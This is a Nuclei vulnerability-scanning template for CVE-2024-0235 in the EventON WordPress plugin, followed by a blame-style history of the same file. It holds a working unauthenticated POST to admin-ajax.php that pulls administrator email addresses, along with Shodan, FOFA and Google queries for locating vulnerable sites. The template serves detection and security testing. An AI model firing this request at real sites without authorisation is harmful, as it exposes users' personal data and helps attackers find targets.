nuclei-templates/http/cves/2024/CVE-2024-0235.yaml

id: CVE-2024-0235

info:
  name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
  author: princechaddha
  severity: medium
  description: |
    The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
  impact: |
    An attacker could potentially access sensitive email information.
  remediation: |
    Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235.
  reference:
    - https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0235
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-0235
    cwe-id: CWE-862
    epss-score: 0.00052
    epss-percentile: 0.19233
    cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: myeventon
    product: eventon
    framework: wordpress
    shodan-query:
      - "vuln:CVE-2023-2796"
      - http.html:/wp-content/plugins/eventon-lite/
      - http.html:/wp-content/plugins/eventon/
    fofa-query:
      - "wp-content/plugins/eventon/"
      - body=/wp-content/plugins/eventon/
      - body=/wp-content/plugins/eventon-lite/
    publicwww-query:
      - "/wp-content/plugins/eventon/"
      - /wp-content/plugins/eventon-lite/
    google-query: "inurl:\"/wp-content/plugins/eventon/\""
  tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"

    headers:
      Content-Type: application/x-www-form-urlencoded

    body: "_user_role=administrator"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '@'
          - 'status":"good'
          - 'value='
          - '"content":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c9b0ad3fa93a5b4f9da91f43f446ebcbfebcc8b5ff4204c82656319ba2919c62022027c3257667f4775e2b409d1e8290be69f98cff8f6eaea854344451cd25dfd327:922c64590222798bb761d5b6d8e72950
Create CVE-2024-0235.yaml 2024-04-28 06:04:28 +00:00			`id: CVE-2024-0235`

			`info:`
updated matcher & info 2024-04-30 05:50:00 +00:00			`name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure`
Create CVE-2024-0235.yaml 2024-04-28 06:04:28 +00:00			`author: princechaddha`
			`severity: medium`
update matcher 2024-04-28 09:17:42 +00:00			`description: \|`
			`The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.`
Create CVE-2024-0235.yaml 2024-04-28 06:04:28 +00:00			`impact: \|`
			`An attacker could potentially access sensitive email information.`
			`remediation: \|`
			`Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235.`
			`reference:`
			`- https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/`
			`- https://github.com/fkie-cad/nvd-json-data-feeds`
updated matcher & info 2024-04-30 05:50:00 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2024-0235`
Create CVE-2024-0235.yaml 2024-04-28 06:04:28 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`
			`cvss-score: 5.3`
			`cve-id: CVE-2024-0235`
			`cwe-id: CWE-862`
			`epss-score: 0.00052`
update matcher 2024-04-28 09:17:42 +00:00			`epss-percentile: 0.19233`
Create CVE-2024-0235.yaml 2024-04-28 06:04:28 +00:00			`cpe: cpe:2.3:a:myeventon:eventon::::::wordpress::*`
			`metadata:`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`max-request: 1`
Create CVE-2024-0235.yaml 2024-04-28 06:04:28 +00:00			`vendor: myeventon`
			`product: eventon`
			`framework: wordpress`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- "vuln:CVE-2023-2796"`
			`- http.html:/wp-content/plugins/eventon-lite/`
			`- http.html:/wp-content/plugins/eventon/`
			`fofa-query:`
			`- "wp-content/plugins/eventon/"`
			`- body=/wp-content/plugins/eventon/`
			`- body=/wp-content/plugins/eventon-lite/`
			`publicwww-query:`
			`- "/wp-content/plugins/eventon/"`
			`- /wp-content/plugins/eventon-lite/`
			`google-query: "inurl:\"/wp-content/plugins/eventon/\""`
			`tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon`
Create CVE-2024-0235.yaml 2024-04-28 06:04:28 +00:00
			`http:`
			`- method: POST`
			`path:`
			`- "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"`

			`headers:`
			`Content-Type: application/x-www-form-urlencoded`

			`body: "_user_role=administrator"`

update matcher 2024-04-28 09:17:42 +00:00			`matchers-condition: and`
Create CVE-2024-0235.yaml 2024-04-28 06:04:28 +00:00			`matchers:`
			`- type: word`
condition and added 2024-04-28 09:24:02 +00:00			`part: body`
Create CVE-2024-0235.yaml 2024-04-28 06:04:28 +00:00			`words:`
update matcher 2024-04-28 09:17:42 +00:00			`- '@'`
updated matcher & info 2024-04-30 05:50:00 +00:00			`- 'status":"good'`
			`- 'value='`
update matcher 2024-04-28 09:17:42 +00:00			`- '"content":'`
condition and added 2024-04-28 09:24:02 +00:00			`condition: and`
update matcher 2024-04-28 09:17:42 +00:00
			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4a0a00473045022100c9b0ad3fa93a5b4f9da91f43f446ebcbfebcc8b5ff4204c82656319ba2919c62022027c3257667f4775e2b409d1e8290be69f98cff8f6eaea854344451cd25dfd327:922c64590222798bb761d5b6d8e72950`